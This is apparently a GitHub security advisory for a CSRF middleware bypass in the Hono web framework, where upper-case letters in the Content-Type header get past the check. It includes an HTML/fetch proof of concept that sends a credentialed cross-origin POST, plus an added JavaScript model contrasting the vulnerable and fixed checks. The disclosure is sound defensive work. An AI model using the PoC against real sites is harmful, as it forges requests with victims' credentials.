GHSA-rpfr-3m35-5vx5
Hono CSRF middleware can be bypassed using crafted Content-Type header
Details
### Summary
Hono CSRF middleware can be bypassed using crafted Content-Type header.
### Details
MIME type names are case-insensitive (RFC 2045), but `isRequestedByFormElementRe` only matches lower-case, so a form-like type written with any upper-case letter is not recognised as a form submission.
https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17
As a result, an attacker can bypass the CSRF middleware by sending a form-like MIME type with upper-case letters, such as `Application/x-www-form-urlencoded`: the browser still treats it as a CORS-safelisted ("simple") request and sends it cross-origin without a preflight, but the middleware does not treat it as a form submission and skips its Origin check.
### PoC
```html
<html>
  <head>
    <title>CSRF Test</title>
    <script defer>
      document.addEventListener("DOMContentLoaded", () => {
        document.getElementById("btn").addEventListener("click", async () => {
          // Cross-origin POST with the crafted Content-Type: the browser treats it
          // as a CORS-safelisted request and sends it, with cookies, without a
          // preflight; the middleware's case-sensitive regex does not recognise it
          // as a form submission and skips the Origin check.
          const res = await fetch("http://victim.example.com/test", {
            method: "POST",
            credentials: "include",
            headers: {
              "Content-Type": "Application/x-www-form-urlencoded",
            },
          });
        });
      });
    </script>
  </head>
  <body>
    <h1>CSRF Test</h1>
    <button id="btn">Click me!</button>
  </body>
</html>
```
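Added example (not Hono's code and not part of the advisory): a small JavaScript model of an Origin-checking CSRF middleware. The vulnerable regex has the case-sensitive shape described above, the second variant adds the `i` flag, and a third compares the parsed MIME essence instead of using a regex. A simplified model of the browser's CORS-safelist check for Content-Type shows why the crafted header in the PoC reaches the server without a preflight. The trusted origin, the constructed request objects and the treatment of a missing Content-Type as `text/plain` are assumptions made for the example.

```javascript
// Added example, not Hono's code: a minimal model of an Origin-checking CSRF
// middleware with the case-sensitive "is this a form submission?" test beside
// two case-insensitive alternatives, plus a simplified model of the browser's
// CORS-safelist check that explains why the crafted request needs no preflight.

// Form-like MIME types that a <form>, or a fetch() without preflight, can send.
const FORM_TYPES = new Set([
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
]);

// Vulnerable shape: matches only lower-case type names, although MIME type
// names are case-insensitive (RFC 2045).
const FORM_TYPE_RE_VULNERABLE =
  /^\b(application\/x-www-form-urlencoded|multipart\/form-data|text\/plain)\b/;

// One fix: the same pattern with the `i` flag.
const FORM_TYPE_RE_FIXED =
  /^\b(application\/x-www-form-urlencoded|multipart\/form-data|text\/plain)\b/i;

const SAFE_METHOD_RE = /^(GET|HEAD)$/;

// Reduce a Content-Type value to its "essence" (type/subtype, parameters
// stripped, lower-cased), which is how a MIME parser compares it.
function mimeEssence(value) {
  return value.split(';')[0].trim().toLowerCase();
}

// Simplified model of the Fetch spec's CORS-safelisted check for Content-Type:
// the value is parsed as a MIME type and only its lower-cased essence is
// compared, so the case of the header never triggers a preflight. (The real
// check also rejects certain bytes in the value.)
function isCorsSafelistedContentType(value) {
  if (new TextEncoder().encode(value).length > 128) return false;
  return FORM_TYPES.has(mimeEssence(value));
}

// Decide whether a request passes the CSRF check. `mode` selects the form test:
// 'vulnerable' (case-sensitive regex), 'fixed' (regex with /i) or 'parsed'
// (compare the MIME essence). A missing Content-Type is treated as text/plain,
// an assumption made here so that a body-less POST is still checked.
function csrfDecision(req, mode, trustedOrigin) {
  if (SAFE_METHOD_RE.test(req.method)) return 'allow';
  const contentType = req.headers['content-type'] ?? 'text/plain';
  let isForm;
  if (mode === 'vulnerable') isForm = FORM_TYPE_RE_VULNERABLE.test(contentType);
  else if (mode === 'fixed') isForm = FORM_TYPE_RE_FIXED.test(contentType);
  else if (mode === 'parsed') isForm = FORM_TYPES.has(mimeEssence(contentType));
  else throw new Error(`unknown mode ${mode}`);
  // Non-form bodies can only be sent cross-origin after a CORS preflight, so
  // the middleware relies on CORS for those and checks Origin only for forms.
  if (!isForm) return 'allow';
  return req.headers['origin'] === trustedOrigin ? 'allow' : 'forbid';
}

const TRUSTED_ORIGIN = 'https://victim.example.com'; // hypothetical site
const ATTACKER_ORIGIN = 'https://attacker.example';  // hypothetical attacker page

// Constructed requests, as the middleware would see them.
const SCENARIOS = {
  sameOriginForm: { method: 'POST', headers: { 'content-type': 'application/x-www-form-urlencoded', origin: TRUSTED_ORIGIN } },
  crossOriginForm: { method: 'POST', headers: { 'content-type': 'application/x-www-form-urlencoded', origin: ATTACKER_ORIGIN } },
  craftedCase: { method: 'POST', headers: { 'content-type': 'Application/x-www-form-urlencoded', origin: ATTACKER_ORIGIN } },
  craftedWithParams: { method: 'POST', headers: { 'content-type': 'Multipart/Form-Data; boundary=xyz', origin: ATTACKER_ORIGIN } },
  crossOriginJson: { method: 'POST', headers: { 'content-type': 'application/json', origin: ATTACKER_ORIGIN } },
  safeGet: { method: 'GET', headers: {} },
};

// Run every scenario through all three variants; returns
// { scenarioName: { vulnerable, fixed, parsed, preflightFree } }.
function runScenarios() {
  const out = {};
  for (const [name, req] of Object.entries(SCENARIOS)) {
    out[name] = {};
    for (const mode of ['vulnerable', 'fixed', 'parsed']) {
      out[name][mode] = csrfDecision(req, mode, TRUSTED_ORIGIN);
    }
    const ct = req.headers['content-type'];
    out[name].preflightFree = ct === undefined ? true : isCorsSafelistedContentType(ct);
  }
  return out;
}

console.table(runScenarios());
```

The `craftedCase` row is the bypass: the browser sends it without a preflight (`preflightFree` is true) and the vulnerable variant answers `allow`, while both case-insensitive variants forbid it. The `crossOriginJson` row is allowed by all three on purpose; that is the middleware's design of deferring non-form bodies to CORS, which the Discussion below questions.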
### Impact
An attacker can bypass the CSRF protection implemented with the Hono CSRF middleware and submit state-changing POST requests from a third-party page with the victim's credentials, provided the browser attaches the session cookie to the cross-site request (for example a cookie with `SameSite=None`, or a browser that does not default to `SameSite=Lax`).
### Discussion
I'm not sure that omitting CSRF checks for simple POST requests is a good idea. CSRF prevention and CORS are different concepts, even though CORS can prevent CSRF in some cases.
References
- https://github.com/honojs/hono/security/advisories/GHSA-rpfr-3m35-5vx5 [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2024-43787 [ADVISORY]
- https://github.com/honojs/hono/commit/41ce840379516410dee60c783142e05bb5a22449 [WEB]
- https://github.com/honojs/hono [PACKAGE]
- https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17 [WEB]